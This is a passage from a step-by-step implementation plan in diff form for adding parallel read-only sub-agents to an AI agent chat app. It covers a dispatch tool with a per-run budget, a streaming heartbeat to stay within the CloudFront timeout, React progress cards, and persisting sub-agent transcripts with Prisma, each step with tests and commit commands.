+import { resolveSubagentBudget } from "./subagent-budget";
+import { createRunBudgetLedger, createDispatchAgentTool } from "./dispatch-agent-tool";
+import { filterReadOnlyTools } from "./subagent";
+```
+
+Then replace the tool-assembly block at line 226 with:
+
+```typescript
+    // Sub-agent tools are assembled FIRST and without dispatch_agent, so the
+    // sub-agents' tool list can never contain the tool that spawns sub-agents.
+    const baseTools = await assembleTools({ includeS3Tools: true, includeMemoryTools: false, includeSkillTool: autoLoadSkills, userId: config.userId, mcpServerIds, tenantId, accounts, knowledgeBaseIds: config.knowledgeBaseIds });
+
+    const subagentBudget = tenantId
+        ? await resolveSubagentBudget(tenantId)
+        : { enabled: false, maxConcurrentSubagents: 1, maxSubagentsPerRun: 1, maxSubagentTokensPerRun: 0, subagentMaxIterations: 2, subagentTimeoutMs: 30_000 };
+
+    const dispatchAgentTool = subagentBudget.enabled
+        ? createDispatchAgentTool({
+            model,
+            subagentTools: filterReadOnlyTools(baseTools as never[]),
+            ledger: createRunBudgetLedger(subagentBudget),
+            budget: subagentBudget,
+            onSubagentEvent: config.onSubagentEvent,
+        })
+        : null;
+
+    const tools = dispatchAgentTool ? [...baseTools, dispatchAgentTool] : baseTools;
+    console.log(`[PlanningAgent] Sub-agents ${subagentBudget.enabled ? `enabled (concurrency=${subagentBudget.maxConcurrentSubagents})` : 'disabled'}`);
+    const modelWithTools = model.bindTools!(tools);
+    const toolNode = new ToolNode(tools);
+```
+
+Add the callback to `GraphConfig` in `apps/web-ui/lib/agent/agent-shared.ts` (after `autoLoadSkills`, line 859):
+
+```typescript
+    /** Live sub-agent progress sink. Set by the chat route so dispatch_agent
+     *  activity can be streamed as data-subagent parts. */
+    onSubagentEvent?: (event: import('./dispatch-agent-tool').SubagentEvent) => void;
+```
+
+- [ ] **Step 7: Teach the executor when to fan out**
+
+In `apps/web-ui/lib/agent/planning-agent.ts`, append to the `## Execution Discipline` block in `generateNode` (after the batching rules added in Task 3):
+
+```
+## Delegation
+
+- When the current step splits into INDEPENDENT investigations — one per account, region, or service — emit several dispatch_agent calls in THIS turn. They run in parallel and each returns a compressed report.
+- Write each sub-agent brief so it stands completely alone: it sees none of this conversation, so spell out account ids, regions, time windows, and what the report must contain.
+- Do NOT delegate work that changes state — sub-agents are read-only. Do NOT delegate a single quick lookup. Do NOT chain sub-agents; they cannot see each other's results.
+- If dispatch_agent replies that the budget is exhausted, simply do that work yourself with your own tools.
+```
+
+- [ ] **Step 8: Verify typecheck and the full suite**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/`
+Expected: PASS with no new failures.
+
+- [ ] **Step 9: Commit**
+
+```bash
+git add apps/web-ui/lib/agent/dispatch-agent-tool.ts apps/web-ui/lib/agent/dispatch-agent-tool.test.ts apps/web-ui/lib/agent/model-factory.ts apps/web-ui/lib/agent/planning-agent.ts apps/web-ui/lib/agent/agent-shared.ts apps/web-ui/lib/agent/tool-classifier.ts
+git commit -m "feat(agent): dispatch_agent fan-out tool with per-run budget ledger
+
+One sub-agent per tool call so ToolNode's existing concurrency performs the
+fan-out. Budget exhaustion returns a do-it-yourself instruction rather than an
+error, so runs degrade to the serial baseline instead of failing."
+```
+
+---
+
+### Task 9: Stream sub-agent progress with a heartbeat
+
+CloudFront's `originReadTimeout` is 60s (`infra/compute/index.ts:962`) while the ALB allows 1200s. Today a 10-minute run survives only because streamed tokens keep resetting the 60s timer. A silent fan-out phase would drop the connection, so the heartbeat is a correctness requirement, not decoration.
+
+**Files:**
+- Modify: `apps/web-ui/app/api/chat/stream-parts.ts`
+- Modify: `apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts`
+- Modify: `apps/web-ui/app/api/chat/route.ts`
+
+**Interfaces:**
+- Consumes: `SubagentEvent` from Task 8.
+- Produces: `buildSubagentPart(event: SubagentEvent): DataPart` emitting `{ type: 'data-subagent', id: 'subagent-<id>', data: {...} }`.
+
+- [ ] **Step 1: Write the failing test**
+
+Append to `apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts`:
+
+```typescript
+import { buildSubagentPart } from '../stream-parts';
+
+describe('buildSubagentPart', () => {
+    const base = {
+        id: 'sa-1', role: 'EC2 auditor', task: 'audit account 1',
+        toolCount: 3, tokensIn: 900, tokensOut: 120,
+    };
+
+    it('builds a stable id so updates replace rather than append', () => {
+        const part = buildSubagentPart({ ...base, status: 'running' });
+        expect(part.type).toBe('data-subagent');
+        expect(part.id).toBe('subagent-sa-1');
+    });
+
+    it('carries progress counters', () => {
+        const part = buildSubagentPart({ ...base, status: 'running' });
+        expect(part.data).toMatchObject({ role: 'EC2 auditor', status: 'running', toolCount: 3, tokensIn: 900 });
+    });
+
+    it('omits the transcript from the stream payload', () => {
+        const part = buildSubagentPart({
+            ...base, status: 'done', summary: 'found things',
+            transcript: [{ kind: 'ai', text: 'internal reasoning' }],
+        });
+        expect(JSON.stringify(part.data)).not.toContain('internal reasoning');
+        expect((part.data as { summary?: string }).summary).toBe('found things');
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/chat/__tests__/stream-parts.test.ts`
+Expected: FAIL — `buildSubagentPart` is not exported.
+
+- [ ] **Step 3: Add the stream part**
+
+In `apps/web-ui/app/api/chat/stream-parts.ts`, add after `buildMemoryPart` (line 28):
+
+```typescript
+/**
+ * One data-subagent part per sub-agent state change. The `id` is stable per
+ * sub-agent so the client replaces the card in place rather than appending a new
+ * one on every progress tick.
+ *
+ * The transcript is deliberately NOT sent: it can be large, and the whole point
+ * of sub-agents is keeping bulk out of the transcript. It is persisted
+ * separately and fetched on demand when a card is expanded.
+ */
+export function buildSubagentPart(event: {
+    id: string;
+    role: string;
+    task: string;
+    status: 'running' | 'done' | 'failed';
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string;
+}): DataPart {
+    return {
+        type: 'data-subagent',
+        id: `subagent-${event.id}`,
+        data: {
+            id: event.id,
+            role: event.role,
+            task: event.task,
+            status: event.status,
+            toolCount: event.toolCount,
+            tokensIn: event.tokensIn,
+            tokensOut: event.tokensOut,
+            ...(event.summary ? { summary: event.summary } : {}),
+        },
+    };
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/chat/__tests__/stream-parts.test.ts`
+Expected: PASS.
+
+- [ ] **Step 5: Wire the sink and the heartbeat into the chat route**
+
+In `apps/web-ui/app/api/chat/route.ts`, add the imports:
+
+```typescript
+import { buildSubagentPart } from './stream-parts';
+import type { SubagentEvent } from '@/lib/agent/dispatch-agent-tool';
+```
+
+(`stream-parts` is already imported — extend the existing import list rather than adding a second statement.)
+
+Inside the `ReadableStream` `start(controller)` body, before the graph stream is created, add the live sink and heartbeat:
+
+```typescript
+            // --- Sub-agent progress ---------------------------------------------
+            // Sub-agent tokens deliberately never reach the transcript: three
+            // concurrent streams interleaved into one column are unreadable, and the
+            // narration was never the deliverable. Collapsed cards instead.
+            const liveSubagents = new Map<string, SubagentEvent>();
+
+            const emitSubagent = (event: SubagentEvent) => {
+                liveSubagents.set(event.id, event);
+                if (event.status !== 'running') liveSubagents.delete(event.id);
+                try {
+                    controller.enqueue(buildSubagentPart(event));
+                } catch {
+                    // Client disconnected — the stream teardown handles it.
+                }
+            };
+
+            // CloudFront's originReadTimeout is 60s (infra/compute/index.ts:962). A
+            // sub-agent can think for 90s without producing a byte, so re-emit the
+            // in-flight cards on a timer to keep the connection alive.
+            const HEARTBEAT_MS = 15_000;
+            const heartbeat = setInterval(() => {
+                for (const event of liveSubagents.values()) {
+                    try {
+                        controller.enqueue(buildSubagentPart(event));
+                    } catch {
+                        // ignore — teardown will clear the interval
+                    }
+                }
+            }, HEARTBEAT_MS);
+```
+
+Pass `emitSubagent` into the graph config where `GraphConfig` is assembled (line 230, alongside `autoApprove`):
+
+```typescript
+                onSubagentEvent: emitSubagent,
+```
+
+Clear the interval in the same teardown path where `logRunSummary(threadId)` was added in Task 2:
+
+```typescript
+                    clearInterval(heartbeat);
+```
+
+- [ ] **Step 6: Verify the heartbeat manually**
+
+With `SUBAGENTS_ENABLED=true` and sub-agents enabled for the tenant, run a fan-out task and watch the browser network tab: `data-subagent` frames must arrive at least every 15 seconds during the fan-out phase, with no gap approaching 60 seconds.
+
+- [ ] **Step 7: Typecheck and commit**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+```bash
+git add apps/web-ui/app/api/chat/stream-parts.ts apps/web-ui/app/api/chat/__tests__/stream-parts.test.ts apps/web-ui/app/api/chat/route.ts
+git commit -m "feat(chat): stream sub-agent progress as data-subagent parts
+
+Collapsed-card progress instead of interleaved token streams, plus a 15s
+heartbeat so a silent fan-out phase cannot exceed CloudFront's 60s
+originReadTimeout and drop the connection."
+```
+
+---
+
+### Task 10: Sub-agent cards in the chat UI
+
+**Files:**
+- Modify: `apps/web-ui/components/agent/chat/run-state.ts`
+- Modify: `apps/web-ui/components/agent/chat/__tests__/run-state.test.ts` (create if absent)
+- Create: `apps/web-ui/components/agent/chat/subagent-card.tsx`
+- Modify: `apps/web-ui/components/agent/chat/run-rail.tsx`
+
+**Interfaces:**
+- Consumes: the `data-subagent` part from Task 9.
+- Produces:
+  - `interface SubagentState { id: string; role: string; task: string; status: 'running' | 'done' | 'failed'; toolCount: number; tokensIn: number; tokensOut: number; summary?: string }`
+  - `RunState.subagents: SubagentState[]`
+  - `<SubagentCard subagent={...} threadId={...} />`
+
+- [ ] **Step 1: Write the failing reducer test**
+
+Create `apps/web-ui/components/agent/chat/__tests__/run-state.test.ts` (or append to it if it exists):
+
+```typescript
+import { describe, it, expect } from 'vitest';
+import { deriveRunState } from '../run-state';
+
+const msg = (parts: unknown[]) => ({ role: 'assistant', id: 'm1', parts } as never);
+
+const subagentPart = (data: Record<string, unknown>) => ({ type: 'data-subagent', data });
+
+describe('deriveRunState — subagents', () => {
+    it('collects sub-agents in first-seen order', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+            subagentPart({ id: 'b', role: 'B', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ])], new Set());
+
+        expect(state.subagents.map(s => s.id)).toEqual(['a', 'b']);
+    });
+
+    it('replaces an earlier update for the same id rather than duplicating', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 1, tokensIn: 10, tokensOut: 2 }),
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'done', toolCount: 5, tokensIn: 900, tokensOut: 80, summary: 'found it' }),
+        ])], new Set());
+
+        expect(state.subagents).toHaveLength(1);
+        expect(state.subagents[0]).toMatchObject({ status: 'done', toolCount: 5, summary: 'found it' });
+    });
+
+    it('marks the run as having structured data', () => {
+        const state = deriveRunState([msg([
+            subagentPart({ id: 'a', role: 'A', task: 't', status: 'running', toolCount: 0, tokensIn: 0, tokensOut: 0 }),
+        ])], new Set());
+
+        expect(state.hasStructuredData).toBe(true);
+    });
+
+    it('returns an empty list when no sub-agent parts are present', () => {
+        expect(deriveRunState([msg([{ type: 'text', text: 'hi' }])], new Set()).subagents).toEqual([]);
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run components/agent/chat/__tests__/run-state.test.ts`
+Expected: FAIL — `state.subagents` is undefined.
+
+- [ ] **Step 3: Extend the reducer**
+
+In `apps/web-ui/components/agent/chat/run-state.ts`, add the interface after `PendingClarification` (line 14):
+
+```typescript
+export interface SubagentState {
+  id: string;
+  role: string;
+  task: string;
+  status: 'running' | 'done' | 'failed';
+  toolCount: number;
+  tokensIn: number;
+  tokensOut: number;
+  summary?: string;
+}
+```
+
+Add to `RunState` (after `tokenUsage`, line 28):
+
+```typescript
+  /** Sub-agents dispatched in this thread, in first-seen order. Later parts for
+   *  the same id replace the earlier entry in place. */
+  subagents: SubagentState[];
+```
+
+Inside `deriveRunState`, declare the accumulator next to the other locals (after line 46):
+
+```typescript
+    const subagents = new Map<string, SubagentState>();
+```
+
+Add the case to the `switch` (after `case 'data-usage'`, line 103):
+
+```typescript
+                case 'data-subagent': {
+                    hasStructuredData = true;
+                    const id = String(part.data?.id ?? '');
+                    if (!id) break;
+                    // Map.set on an existing key preserves insertion order, so the
+                    // card stays put as it updates from running → done.
+                    subagents.set(id, {
+                        id,
+                        role: String(part.data?.role ?? ''),
+                        task: String(part.data?.task ?? ''),
+                        status: (part.data?.status === 'done' || part.data?.status === 'failed')
+                            ? part.data.status : 'running',
+                        toolCount: Number(part.data?.toolCount) || 0,
+                        tokensIn: Number(part.data?.tokensIn) || 0,
+                        tokensOut: Number(part.data?.tokensOut) || 0,
+                        ...(part.data?.summary ? { summary: String(part.data.summary) } : {}),
+                    });
+                    break;
+                }
+```
+
+Add to the returned object (after `tokenUsage`, line 124):
+
+```typescript
+        subagents: Array.from(subagents.values()),
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run components/agent/chat/__tests__/run-state.test.ts`
+Expected: PASS, 4 tests.
+
+- [ ] **Step 5: Build the card**
+
+Create `apps/web-ui/components/agent/chat/subagent-card.tsx`:
+
+```tsx
+'use client';
+
+import { useState } from 'react';
+import { Bot, CheckCircle2, ChevronDown, ChevronRight, Loader2, XCircle } from 'lucide-react';
+
+import { cn } from '@/lib/utils';
+import type { SubagentState } from './run-state';
+
+function formatTokens(n: number): string {
+  return n >= 1000 ? `${(n / 1000).toFixed(1)}k` : String(n);
+}
+
+const STATUS_ICON = {
+  running: <Loader2 className="h-3.5 w-3.5 animate-spin text-muted-foreground" />,
+  done: <CheckCircle2 className="h-3.5 w-3.5 text-green-500" />,
+  failed: <XCircle className="h-3.5 w-3.5 text-destructive" />,
+} as const;
+
+export function SubagentCard({ subagent }: { subagent: SubagentState }) {
+  const [expanded, setExpanded] = useState(false);
+  const canExpand = subagent.status !== 'running' && !!subagent.summary;
+
+  return (
+    <div className="rounded-md border bg-muted/30 text-sm">
+      <button
+        type="button"
+        className={cn(
+          'flex w-full items-center gap-2 px-3 py-2 text-left',
+          canExpand ? 'cursor-pointer hover:bg-muted/50' : 'cursor-default',
+        )}
+        onClick={() => canExpand && setExpanded(v => !v)}
+        aria-expanded={canExpand ? expanded : undefined}
+        disabled={!canExpand}
+      >
+        {canExpand
+          ? (expanded ? <ChevronDown className="h-3.5 w-3.5 shrink-0" /> : <ChevronRight className="h-3.5 w-3.5 shrink-0" />)
+          : <Bot className="h-3.5 w-3.5 shrink-0 text-muted-foreground" />}
+
+        {STATUS_ICON[subagent.status]}
+
+        <span className="flex-1 truncate font-medium">{subagent.role}</span>
+
+        <span className="shrink-0 text-xs tabular-nums text-muted-foreground">
+          {subagent.toolCount} tools · {formatTokens(subagent.tokensIn + subagent.tokensOut)} tokens
+        </span>
+      </button>
+
+      {expanded && subagent.summary && (
+        <div className="border-t px-3 py-2">
+          <p className="mb-1 text-xs font-medium text-muted-foreground">Task</p>
+          <p className="mb-3 whitespace-pre-wrap text-xs text-muted-foreground">{subagent.task}</p>
+          <p className="mb-1 text-xs font-medium text-muted-foreground">Findings</p>
+          <p className="whitespace-pre-wrap text-xs">{subagent.summary}</p>
+        </div>
+      )}
+    </div>
+  );
+}
+```
+
+- [ ] **Step 6: Fix the existing RunRail test fixture**
+
+`apps/web-ui/components/agent/chat/__tests__/run-rail.test.tsx` builds a complete `RunState` literal (`EMPTY_RUN_STATE`, line 7). Adding a required field to `RunState` breaks its typecheck, so update it now — add after `tokenUsage` (line 15):
+
+```tsx
+  subagents: [],
+```
+
+Run: `cd apps/web-ui && bunx vitest run components/agent/chat/__tests__/run-rail.test.tsx`
+Expected: PASS (unchanged behaviour, fixture now complete).
+
+- [ ] **Step 7: Render the cards in the run rail**
+
+`RunRail` currently takes `{ runState, isStreaming, context }` (line 45) and has no thread id, so add one. In `apps/web-ui/components/agent/chat/run-rail.tsx`:
+
+Add to the imports:
+
+```tsx
+import { Bot } from "lucide-react";
+import { SubagentCard } from "./subagent-card";
+```
+
+(`lucide-react` is already imported — add `Bot` to the existing named import list rather than adding a second statement.)
+
+Extend the props:
+
+```tsx
+export function RunRail({
+  runState,
+  isStreaming,
+  context,
+  threadId,
+}: {
+  runState: RunState;
+  isStreaming: boolean;
+  context: { accountNames: string[]; modelLabel: string; skillName: string | null; toolCount: number | null; kbLabel: string };
+  /** Needed to fetch a persisted sub-agent transcript when a card is expanded
+   *  after a reload. Optional so the existing rail tests keep compiling. */
+  threadId?: string;
+}) {
+```
+
+Render the group using the file's own `RailSection` wrapper (line 33), placed immediately after the plan `RailSection` block that ends at line 102's closing `)}`:
+
+```tsx
+      {runState.subagents.length > 0 && (
+        <RailSection
+          icon={Bot}
+          title={`Sub-agents (${runState.subagents.filter((s) => s.status === "running").length} running)`}
+        >
+          <div className="space-y-1.5">
+            {runState.subagents.map((subagent) => (
+              <SubagentCard key={subagent.id} subagent={subagent} threadId={threadId} />
+            ))}
+          </div>
+        </RailSection>
+      )}
+```
+
+- [ ] **Step 8: Pass the thread id from the session view**
+
+In `apps/web-ui/components/agent/workspace/session-view.tsx:372`, add the prop:
+
+```tsx
+            <RunRail runState={runState} isStreaming={isStreaming} context={pickers.railContext} threadId={threadId} />
+```
+
+`threadId` is already a `SessionView` prop (line 45), so nothing else needs threading.
+
+- [ ] **Step 9: Typecheck, lint, and verify visually**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bun run lint`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bunx vitest run components/agent/chat/`
+Expected: PASS.
+
+With sub-agents enabled, run a fan-out task and confirm: one card per sub-agent, spinners while running, live tool/token counters, green ticks on completion, cards expand to show task and findings, and no sub-agent prose leaks into the transcript.
+
+- [ ] **Step 10: Commit**
+
+```bash
+git add apps/web-ui/components/agent/chat/run-state.ts apps/web-ui/components/agent/chat/__tests__/ apps/web-ui/components/agent/chat/subagent-card.tsx apps/web-ui/components/agent/chat/run-rail.tsx apps/web-ui/components/agent/workspace/session-view.tsx
+git commit -m "feat(ui): collapsed sub-agent cards in the chat run rail"
+```
+
+---
+
+### Task 11: Persist sub-agent transcripts for expansion after reload
+
+Stream data parts are not persisted — chat history is rebuilt from the LangGraph checkpointer. Live expansion works from client state, but a page reload loses it. The transcript must never travel in the `dispatch_agent` ToolMessage, because that message enters the orchestrator's context and would defeat the isolation the whole feature exists to provide.
+
+**Files:**
+- Modify: `libs/prisma/schema.prisma`
+- Create: `apps/web-ui/lib/db/repositories/subagent/interface.ts`
+- Create: `apps/web-ui/lib/db/repositories/subagent/postgres.ts`
+- Modify: `apps/web-ui/lib/db/repository-factory.ts`
+- Create: `apps/web-ui/app/api/chat/subagents/[threadId]/route.ts`
+- Create: `apps/web-ui/app/api/chat/subagents/[threadId]/route.test.ts`
+- Modify: `apps/web-ui/app/api/chat/route.ts` (persist on terminal events)
+- Modify: `apps/web-ui/components/agent/chat/subagent-card.tsx` (fetch on expand)
+
+**Interfaces:**
+- Consumes: `SubagentEvent` from Task 8; `emitSubagent` sink from Task 9.
+- Produces:
+  - `interface SubagentRunRepository { save(record: SubagentRunRecord): Promise<void>; listByThread(tenantId: string, threadId: string): Promise<SubagentRunRecord[]> }`
+  - `getSubagentRunRepository(): SubagentRunRepository`
+  - `GET /api/chat/subagents/[threadId]` → `{ success: true, data: SubagentRunRecord[] }`
+
+- [ ] **Step 1: Add the Prisma model**
+
+In `libs/prisma/schema.prisma`, add next to `ChatMessage` (line 615):
+
+```prisma
+// AgentSubagentRun — one row per dispatch_agent sub-agent, so a collapsed card
+// can be expanded after a page reload. The transcript lives here and NEVER in
+// the orchestrator's message list: putting it there would defeat the context
+// isolation that makes sub-agents worthwhile.
+model AgentSubagentRun {
+  id         String   @id @default(cuid())
+  tenantId   String
+  threadId   String
+  subagentId String
+  role       String
+  task       String
+  status     String // running|done|failed
+  toolCount  Int      @default(0)
+  tokensIn   Int      @default(0)
+  tokensOut  Int      @default(0)
+  summary    String?
+  transcript Json?
+  createdAt  DateTime @default(now())
+  expiresAt  DateTime // 30-day TTL, matching ChatMessage
+
+  @@unique([tenantId, threadId, subagentId])
+  @@index([tenantId, threadId, createdAt])
+  @@index([expiresAt])
+  @@map("agent_subagent_runs")
+}
+```
+
+- [ ] **Step 2: Generate the migration and audit it**
+
+Run: `cd apps/web-ui && bun run db:migrate`
+When prompted, name it `add_agent_subagent_runs`.
+
+**Then open the generated SQL under `libs/prisma/migrations/` and read every statement.** Per the project's recorded history, `prisma migrate dev` silently emits `DROP INDEX` for raw-SQL-created HNSW/GIN/IVFFlat indexes it treats as drift. If you find any `DROP INDEX` unrelated to this new table, delete those lines before the migration is applied anywhere else, and add a follow-up idempotent migration recreating anything already dropped locally. Never edit a migration that has already been applied in a shared environment.
+
+Run: `cd apps/web-ui && bun run db:generate && cd ../workers && bun run db:generate`
+Expected: both clients regenerate without error.
+
+- [ ] **Step 3: Write the failing route test**
+
+Create `apps/web-ui/app/api/chat/subagents/[threadId]/route.test.ts`:
+
+```typescript
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+vi.mock('@/lib/rbac/authorize', () => ({ authorize: vi.fn() }));
+vi.mock('@/lib/auth-session', () => ({ getSessionTenantId: vi.fn() }));
+vi.mock('@/lib/db/repository-factory', () => ({
+    getSubagentRunRepository: vi.fn(),
+}));
+
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
+import { GET } from './route';
+
+const params = (threadId: string) => ({ params: Promise.resolve({ threadId }) });
+const listByThread = vi.fn();
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(authorize).mockResolvedValue(null as never);
+    vi.mocked(getSessionTenantId).mockResolvedValue('t1' as never);
+    vi.mocked(getSubagentRunRepository).mockReturnValue({ save: vi.fn(), listByThread } as never);
+    listByThread.mockResolvedValue([{ subagentId: 'a', role: 'A', transcript: [] }]);
+});
+
+describe('GET /api/chat/subagents/[threadId]', () => {
+    it('returns the thread\'s sub-agent runs', async () => {
+        const body = await (await GET({} as never, params('thread-1'))).json();
+
+        expect(body.success).toBe(true);
+        expect(body.data).toHaveLength(1);
+        expect(listByThread).toHaveBeenCalledWith('t1', 'thread-1');
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await GET({} as never, params('thread-1'))).toBe(denied);
+    });
+
+    it('403s with no tenant context', async () => {
+        vi.mocked(getSessionTenantId).mockResolvedValue(null as never);
+        expect((await GET({} as never, params('thread-1'))).status).toBe(403);
+    });
+
+    it('500s when the repository throws', async () => {
+        listByThread.mockRejectedValue(new Error('db down'));
+        expect((await GET({} as never, params('thread-1'))).status).toBe(500);
+    });
+});
+```
+
+- [ ] **Step 4: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/chat/subagents/`
+Expected: FAIL — cannot resolve `./route`.
+
+- [ ] **Step 5: Implement the repository**
+
+Create `apps/web-ui/lib/db/repositories/subagent/interface.ts`:
+
+```typescript
+export interface SubagentTranscriptEntry {
+    kind: 'ai' | 'tool';
+    name?: string;
+    text: string;
+}
+
+export interface SubagentRunRecord {
+    tenantId: string;
+    threadId: string;
+    subagentId: string;
+    role: string;
+    task: string;
+    status: string;
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string | null;
+    transcript?: SubagentTranscriptEntry[] | null;
+}
+
+export interface SubagentRunRepository {
+    /** Upsert by (tenantId, threadId, subagentId) — a sub-agent is written once
+     *  on completion, but a retried write must not create a duplicate row. */
+    save(record: SubagentRunRecord): Promise<void>;
+    listByThread(tenantId: string, threadId: string): Promise<SubagentRunRecord[]>;
+}
+```
+
+Create `apps/web-ui/lib/db/repositories/subagent/postgres.ts`:
+
+```typescript
+import { getTenantClient } from '@/lib/db/pg-config';
+import type { SubagentRunRecord, SubagentRunRepository, SubagentTranscriptEntry } from './interface';
+
+const TTL_30_DAYS_MS = 30 * 24 * 60 * 60 * 1000;
+
+export class SubagentRunPostgresRepository implements SubagentRunRepository {
+    async save(record: SubagentRunRecord): Promise<void> {
+        const db = getTenantClient(record.tenantId);
+        const data = {
+            tenantId: record.tenantId,
+            threadId: record.threadId,
+            subagentId: record.subagentId,
+            role: record.role,
+            task: record.task,
+            status: record.status,
+            toolCount: record.toolCount,
+            tokensIn: record.tokensIn,
+            tokensOut: record.tokensOut,
+            summary: record.summary ?? null,
+            transcript: (record.transcript ?? null) as never,
+            expiresAt: new Date(Date.now() + TTL_30_DAYS_MS),
+        };
+
+        await db.agentSubagentRun.upsert({
+            where: {
+                tenantId_threadId_subagentId: {
+                    tenantId: record.tenantId,
+                    threadId: record.threadId,
+                    subagentId: record.subagentId,
+                },
+            },
+            create: data,
+            update: data,
+        });
+    }
+
+    async listByThread(tenantId: string, threadId: string): Promise<SubagentRunRecord[]> {
+        const db = getTenantClient(tenantId);
+        const rows = await db.agentSubagentRun.findMany({
+            where: { threadId },
+            orderBy: { createdAt: 'asc' },
+        });
+
+        return rows.map(row => ({
+            tenantId: row.tenantId,
+            threadId: row.threadId,
+            subagentId: row.subagentId,
+            role: row.role,
+            task: row.task,
+            status: row.status,
+            toolCount: row.toolCount,
+            tokensIn: row.tokensIn,
+            tokensOut: row.tokensOut,
+            summary: row.summary,
+            transcript: (row.transcript ?? null) as SubagentTranscriptEntry[] | null,
+        }));
+    }
+}
+```
+
+In `apps/web-ui/lib/db/repository-factory.ts`, add the accessor following the existing pattern in that file:
+
+```typescript
+import { SubagentRunPostgresRepository } from './repositories/subagent/postgres';
+import type { SubagentRunRepository } from './repositories/subagent/interface';
+
+let subagentRunRepository: SubagentRunRepository | null = null;
+
+export function getSubagentRunRepository(): SubagentRunRepository {
+    if (!subagentRunRepository) subagentRunRepository = new SubagentRunPostgresRepository();
+    return subagentRunRepository;
+}
+```
+
+- [ ] **Step 6: Implement the route**
+
+Create `apps/web-ui/app/api/chat/subagents/[threadId]/route.ts`:
+
+```typescript
+import { NextRequest, NextResponse } from 'next/server';
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
+
+export async function GET(
+    _request: NextRequest,
+    { params }: { params: Promise<{ threadId: string }> },
+) {
+    console.log('API - GET /api/chat/subagents/[threadId] - Fetching sub-agent runs');
+
+    const authError = await authorize('read', 'Agent');
+    if (authError) return authError;
+
+    try {
+        const tenantId = await getSessionTenantId();
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const { threadId } = await params;
+        // listByThread goes through getTenantClient, so the query is tenant-scoped
+        // regardless of what threadId the caller supplies.
+        const runs = await getSubagentRunRepository().listByThread(tenantId, threadId);
+
+        return NextResponse.json({ success: true, data: runs });
+    } catch (error) {
+        console.error('API - Error fetching sub-agent runs:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to fetch sub-agent runs' },
+            { status: 500 },
+        );
+    }
+}
+```
+
+- [ ] **Step 7: Run the route test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/chat/subagents/`
+Expected: PASS, 4 tests.
+
+- [ ] **Step 8: Persist on terminal sub-agent events**
+
+In `apps/web-ui/app/api/chat/route.ts`, extend the `emitSubagent` sink added in Task 9 so terminal events are written:
+
+```typescript
+            const emitSubagent = (event: SubagentEvent) => {
+                liveSubagents.set(event.id, event);
+                if (event.status !== 'running') {
+                    liveSubagents.delete(event.id);
+                    // Fire-and-forget: a persistence failure must never break the run.
+                    if (tenantId) {
+                        getSubagentRunRepository().save({
+                            tenantId,
+                            threadId,
+                            subagentId: event.id,
+                            role: event.role,
+                            task: event.task,
+                            status: event.status,
+                            toolCount: event.toolCount,
+                            tokensIn: event.tokensIn,
+                            tokensOut: event.tokensOut,
+                            summary: event.summary ?? null,
+                            transcript: (event.transcript ?? null) as never,
+                        }).catch(err => console.error('[Chat] Failed to persist sub-agent run:', err));
+                    }
+                }
+                try {
+                    controller.enqueue(buildSubagentPart(event));
+                } catch {
+                    // Client disconnected — the stream teardown handles it.
+                }
+            };
+```
+
+Add the import:
+
+```typescript
+import { getSubagentRunRepository } from '@/lib/db/repository-factory';
+```
+
+- [ ] **Step 9: Fetch the transcript when a card is expanded**
+
+In `apps/web-ui/components/agent/chat/subagent-card.tsx`, accept a `threadId` prop and lazily load the persisted transcript. Replace the component signature and add the fetch:
+
+```tsx
+export function SubagentCard({ subagent, threadId }: { subagent: SubagentState; threadId?: string }) {
+  const [expanded, setExpanded] = useState(false);
+  const canExpand = subagent.status !== 'running' && !!subagent.summary;
+
+  // Loaded only on expand, and only when this card came from history (no live
+  // summary). Keeps the default render free of network work.
+  const { data: transcript } = useQuery({
+    queryKey: ['subagent-transcript', threadId, subagent.id],
+    enabled: expanded && !!threadId,
+    queryFn: async () => {
+      const res = await fetch(`/api/chat/subagents/${threadId}`);
+      const json = await res.json().catch(() => ({}));
+      if (!res.ok || !json.success) throw new Error(json.error || 'Failed to load sub-agent transcript');
+      const match = (json.data as Array<{ subagentId: string; transcript?: Array<{ kind: string; name?: string; text: string }> }>)
+        .find(r => r.subagentId === subagent.id);
+      return match?.transcript ?? [];
+    },
+  });
+```
+
+Add the import:
+
+```tsx
+import { useQuery } from '@tanstack/react-query';
